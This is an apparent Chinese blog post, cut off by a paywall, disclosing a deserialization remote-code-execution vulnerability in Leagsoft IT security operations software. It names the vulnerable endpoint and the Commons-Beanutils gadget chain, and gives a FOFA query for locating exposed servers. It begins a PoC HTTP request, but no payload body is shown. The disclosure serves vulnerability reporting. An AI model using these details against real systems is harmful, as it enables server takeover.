超级会员免费看
这篇博客介绍了联软IT安全运维管理软件中存在的一处反序列化漏洞,该漏洞可能导致远程代码执行,攻击者可以利用此漏洞执行任意命令并获取服务器权限。文章详细阐述了漏洞概述、复现环境和修复建议。
0x01 产品简介
联软科技持续十多年研发的联软IT安全运维管理软件,集网络准入控制、终端安全管理、BYOD设备管理、杀毒管理、服务器安全管理、数据防泄密、反APT攻击等系统于一体,通过一个平台,统一框架,数据集中,实现更强更智能的安全保护,减轻安全管理负担,降低采购和维护成本。
0x02 漏洞概述
联软IT安全运维管理软件,在 PolicySetDetailController 中 的queryPolicyUseConditionDetail 方法在对输入参数进行处理的过程中进行了反序列化操作,可使用 Commons-Beanutils 反序列化链进行RCE。攻击者可利用该漏洞执行任意代码,在服务器上执行命令、打入内存马等操作,获取服务器权限。
0x03 复现环境
FOFA:app="联软科技-IT安全运维管理系统"
0x04 漏洞复现
PoC
POST /DBAService/PolicySetDetailController/queryPolicyUseConditionDetail HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 7257
Content-Type: application/x-www-form-urlencod
订阅专栏 解锁全文
2245
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
